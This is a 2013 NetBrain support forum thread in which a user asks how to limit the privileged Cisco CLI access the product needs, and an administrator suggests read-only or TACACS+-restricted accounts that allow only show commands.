Netbrain
Home NetBrain Product One-Skill-at-a-Time Search Mark Forums Read
Go BackThe Net-BrainerNetBrain Product CLI security concerns

Reply
 
Thread Tools Search this Thread Display Modes
Old 04-17-2013, 05:18 AM
Pirx Pirx is offline
 
Join Date: Apr 2013
Posts: 4
Default CLI security concerns

Our company has been trying out NetBrain 5 for some time and we like it so far. But we have some security concerns about NetBrain, especially about the way it accesses devices. To have full information it needs CLI access which is considered a security violation.
Especially taking into account that on Cisco devices you can't just issue "show running-configuration" command without read-write CLI access to the device.

Do you have some CLI configuration guidelines how to secure CLI access or how to work around it without compromising security?
Reply With Quote
Old 04-17-2013, 07:26 AM
Gerry Gerry is offline
Administrator
 
Join Date: May 2012
Posts: 69
Default Re: CLI security concerns

Quote:
Originally Posted by Pirx View Post
Our company has been trying out NetBrain 5 for some time and we like it so far. But we have some security concerns about NetBrain, especially about the way it accesses devices. To have full information it needs CLI access which is considered a security violation.
Especially taking into account that on Cisco devices you can't just issue "show running-configuration" command without read-write CLI access to the device.

Do you have some CLI configuration guidelines how to secure CLI access or how to work around it without compromising security?
Hi,

Sorry, i m not sure about your concerns. Especially the especially words: “Especially taking into account that on Cisco devices you can't just issue "show running-configuration" command without read-write CLI access to the device” Can you elaborate it more? If you would like to prevent someone to issue the show commands, you can do a limitation via assigning different roles. I am not sure if I am in right path. Hope more info.
Reply With Quote
Old 04-18-2013, 08:14 AM
Pirx Pirx is offline
 
Join Date: Apr 2013
Posts: 4
Default Re: CLI security concerns

Well the concern is that account which can issue "show running-config" can also do "conf ..." commands doesn't it?
This made some of my collegues point out that is could represent a security issue.
Possibly i am wrong.
That is why i am asking about some CLI access configuration guidelines.
Reply With Quote
Old 04-19-2013, 02:32 AM
Gerry Gerry is offline
Administrator
 
Join Date: May 2012
Posts: 69
Default Re: CLI security concerns

Quote:
Originally Posted by Pirx View Post
Well the concern is that account which can issue "show running-config" can also do "conf ..." commands doesn't it?
This made some of my collegues point out that is could represent a security issue.
Possibly i am wrong.
That is why i am asking about some CLI access configuration guidelines.
I got it, the accounts which are stored at Netbrain Shared Device Settings (Shared) are only for benchmark and kinds of show commands activities, not allowed to issue “config…” commands. User is not allowed to issue config commands via netbrain, and the only way is to login to physical devices which needs user to enter credentials manually (Or using Local device settings).
Or you can configure the Read-only account which only allows show commands or specific show commands, and then I think your concerns will be terminated. If you choose the latter, I can email you a document which describes show commands used by netbrain.
Hope it helps.
Reply With Quote
Old 04-19-2013, 02:34 AM
Pirx Pirx is offline
 
Join Date: Apr 2013
Posts: 4
Default Re: CLI security concerns

To clarify:
In Cisco devices in order to issue "show running-config" you need an access level 15
Level 15 access allows to execute any commands on the device, including configuration changes hence the question.

Is "show running-config" absolutely necessary for NetBrain to collect full information?

Do you have any configuration templates for configuring CLI access to the devices taking into account security concerns?
Reply With Quote
Old 04-19-2013, 04:49 AM
Gerry Gerry is offline
Administrator
 
Join Date: May 2012
Posts: 69
Default Re: CLI security concerns

Quote:
Originally Posted by Pirx View Post
To clarify:
In Cisco devices in order to issue "show running-config" you need an access level 15
Level 15 access allows to execute any commands on the device, including configuration changes hence the question.

Is "show running-config" absolutely necessary for NetBrain to collect full information?

Do you have any configuration templates for configuring CLI access to the devices taking into account security concerns?

Yes, show running-config is necessary for full features of netbrain. But netbrain does a limitation on the config commands to devices and only allows show commands. For the Change Management feature of OEv5.0, you can make the control via assigning the user roles from Customer License server.

We got some customers to create special accounts in their TACACS+ server like only allow special show commands to issue in devices to meet their security requirement.

Sorry, we do not have this kind of documents now :<.

Thanks
Gerry
Reply With Quote
Old 04-19-2013, 05:17 AM
Pirx Pirx is offline
 
Join Date: Apr 2013
Posts: 4
Default Re: CLI security concerns

I see.
Thanks a lot for clarifying.
Could you please send me that document about show commands NetBrain does you mentioned before?
Reply With Quote
Old 04-19-2013, 06:20 AM
Gerry Gerry is offline
Administrator
 
Join Date: May 2012
Posts: 69
Default Re: CLI security concerns

Quote:
Originally Posted by Pirx View Post
I see.
Thanks a lot for clarifying.
Could you please send me that document about show commands NetBrain does you mentioned before?
Hi,

I emailed you the document link, please refer to it, thanks.
Reply With Quote
Reply

Bookmarks

Tags
Network Discovery

Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes

Forum Jump

All times are GMT -4. The time now is 03:54 AM.
Powered by vBulletin
Copyright © 2000-2010 Jelsoft Enterprises Limited.
Copyright © 2009 NetBrain, Inc. All rights reserved.